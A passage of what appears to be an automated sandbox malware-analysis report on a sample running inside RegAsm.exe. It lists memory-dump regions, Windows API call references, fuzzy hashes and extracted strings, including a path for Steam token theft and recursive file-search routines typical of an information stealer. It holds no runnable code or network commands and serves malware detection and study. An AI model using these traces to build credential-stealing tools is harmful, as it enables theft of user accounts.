                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                                                        • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                        • API String ID: 2356188485-3507145866
                                                                                                                                                                                                                                        • Opcode ID: 47b29080a07d3bac26feb1bce17842fb0e49f105c5668c1486bf498ef0972044
                                                                                                                                                                                                                                        • Instruction ID: 057213227454b999660eab999351d39f71ae5e0843097ab142fe287d80eba7c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47b29080a07d3bac26feb1bce17842fb0e49f105c5668c1486bf498ef0972044
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B315E71800248EACB15EBA5C906BDDBBB8AB19308F50416EF905736C2DF7C1608CAB6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                                                                                        • String ID: c?A
                                                                                                                                                                                                                                        • API String ID: 3494564517-3973445457
                                                                                                                                                                                                                                        • Opcode ID: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
                                                                                                                                                                                                                                        • Instruction ID: 2f6bf1855c54fdaf0a86b6469ee1b170798d26e677cda476d0f85d276026e230
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EF0EC363406151787120F5D98405A7F79EEFD5E50714426BEB68DB3A5D925DC4042E4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00417B37
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,014616B8), ref: 00417B56
                                                                                                                                                                                                                                          • Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
                                                                                                                                                                                                                                          • Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F
                                                                                                                                                                                                                                          • Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
                                                                                                                                                                                                                                          • Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
                                                                                                                                                                                                                                          • Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
                                                                                                                                                                                                                                          • Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
                                                                                                                                                                                                                                          • Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
                                                                                                                                                                                                                                          • Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,0145F8A0), ref: 00417963
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
                                                                                                                                                                                                                                          • Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9
                                                                                                                                                                                                                                          • Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
                                                                                                                                                                                                                                          • Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
                                                                                                                                                                                                                                          • Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 153043497-0
                                                                                                                                                                                                                                        • Opcode ID: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
                                                                                                                                                                                                                                        • Instruction ID: de26392101a7e2bfefa2a23e194a6feb2729e77266eca017e9eca27cf8ee7779
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD51AEB1900204ABCB04EF64CC42EEE7779AB49B04F10475EFD4567292DB789B88CBE5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406AEE), ref: 0040668F
                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406AEE), ref: 004066C3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
                                                                                                                                                                                                                                        • Instruction ID: 9c2575cd9cc3d2590bf8831d886fe8abcf871dfdbc43e53dc684b4ea66081c40
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B21B4B13407005BC334CF79DC91FA7BBEAEB80714F144A2EEA5AD63D0D67AA850C658
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
                                                                                                                                                                                                                                        • Instruction ID: 8a5e77b9863af6b226ff7dc5fb5ac28a5c2fe39b41e9eed2e301d918e302b378
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 034180B5E002159BCB14DF59D941AAFB7B8AF54314F11407BE80AE7391E738ED10CB95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 19E1F077
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 4bbbc8bbbda54acb05f7e9a8dd7812fcc70af1ef2c5241ae3dae8a8a1fae3639
                                                                                                                                                                                                                                        • Instruction ID: 729789d9cd3ec4f24ac78e3d1fade2fd2ad0052ef22a865fa06222671065489c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bbbc8bbbda54acb05f7e9a8dd7812fcc70af1ef2c5241ae3dae8a8a1fae3639
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8F0C236741516EBCB221A25FC00B4A275DDFE1BB6B2DC935E8659F1F0DE64D80191E0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHFileOperationA.SHELL32(0041873A,0041873A), ref: 00411D49
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileOperation
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3080627654-0
                                                                                                                                                                                                                                        • Opcode ID: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
                                                                                                                                                                                                                                        • Instruction ID: ad82ca9af257c979786628663affac42eb56b3cf1ee156bcd106859eda3eeca6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22E0A5B0E0421D9BCB40DFE4E40469EBBF4EF48304F40816AD408A6200EB7446458BE9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004173EE
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004173F5
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0041740E
                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00417425
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004174A0
                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00417507
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0145F8A0), ref: 0041752B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,01461738), ref: 0041753F
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00417549
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00417557
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Find$FileHeaplstrcatlstrlenwsprintf$AllocCloseFirstNextProcess
                                                                                                                                                                                                                                        • String ID: %s\%s$%s\*$pwA
                                                                                                                                                                                                                                        • API String ID: 1803110163-364130743
                                                                                                                                                                                                                                        • Opcode ID: 4d7073bcb4c5c9b4c1952d97adaf5c1e491871a38b22f209f22047fcc1ab5773
                                                                                                                                                                                                                                        • Instruction ID: ee0857e10955c6073d5021abd361dbdc8db23b38c03d5012e4d9e3a533002cd5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d7073bcb4c5c9b4c1952d97adaf5c1e491871a38b22f209f22047fcc1ab5773
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3151D475900219ABCB10EFA0CC49FEE77B9BF09704F50459EF605A3191DB789B88CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-860711957
                                                                                                                                                                                                                                        • Opcode ID: ccc7eedeac4ccd8b11a373d7342f3ad37999c6dbc708d2d5092077170c947cc5
                                                                                                                                                                                                                                        • Instruction ID: 2bcd97ab7d82d13933319b357e5262c0dbfab720e0b87c8acdd6ee45b75d2868
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccc7eedeac4ccd8b11a373d7342f3ad37999c6dbc708d2d5092077170c947cc5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB1223B09007419BE7209F34EC45B5777E8AF45358F0C452CE8D98BA92E776F488CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 21259b02aeb20b909706c1718ba49caae641eb45e8a385ec4292836d7bfeef74
                                                                                                                                                                                                                                        • Instruction ID: d220b8d29c7f630f99633d5e07601172c9e72fa8722eec5e55093b08e519437b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21259b02aeb20b909706c1718ba49caae641eb45e8a385ec4292836d7bfeef74
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E981C6B6604301ABE710DF68EC81B6BB3E9EF84354F58142CF9C69B250EB75E9418793
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
